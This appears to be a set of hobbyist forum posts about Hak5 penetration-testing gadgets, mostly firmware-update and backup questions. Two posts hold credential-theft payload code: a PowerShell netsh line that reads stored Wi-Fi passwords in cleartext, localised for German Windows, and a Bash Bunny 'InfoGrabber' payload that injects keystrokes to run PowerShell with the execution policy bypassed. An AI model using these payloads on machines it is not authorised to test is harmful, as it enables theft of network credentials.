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  1. Hi,my keycroc is on the latest fimware ... I've tried everything as described here in various posts but the connection to C2 still doesn't work. Would it be possible to update the OS from keycroc to something current stable or is it already "end of live" like all of my other hak5 devices? br, rowie
  2. - mein nano macht probleme mit der sd-karte seit dem update und ein paar module gehn nicht. - bei meinem lanturtle funktioniert das autossh module nicht mehr - usw...
  3. Hi, is there a simple way to backup all my stuff before the upgrade? It is tedious to set up everything again and again after an update
  4. ok, cant remember what i have done :-) copy the file to the / of the bunny and save reject it?
  5. MESSENGER: signal OS: Parrotsec (all apps sandboxed & disc full encryption) MAIL: protonmail & mailbox.org CHAT: pidgin & revolt VPN: own OpenvpnAS PHONE-OS: LineageOS did I forgot something?
  6. Hi, how to update from 1.6beta (1.6.364) to stable 1.6?
  7. found it! de - en was the problem en: $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Key Content") -split ":")[1]).Trim() de: $WLANProfilePassword = (((netsh.exe wlan show profiles name="$WLANProfileName" key=clear | select-string -Pattern "Schlüsselinhalt") -split ":")[1]).Trim() now it works!
  8. Hi bunny lovers, the InfoGrabber is very nice and i have optimized the payload commands a little bit LED SETUP ATTACKMODE HID STORAGE # Set your language here DUCKY_LANG de GET SWITCH_POSITION RUN WIN powershell -executionpolicy Bypass ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\run.ps1')" LED G #Green means good to go but there is no way for me to see any wifi password inside. only: when i run the: netsh wlan show profile name=blabla-wifi key=clear i got an .xml file with the password inside. pls help pros! thx, rowie
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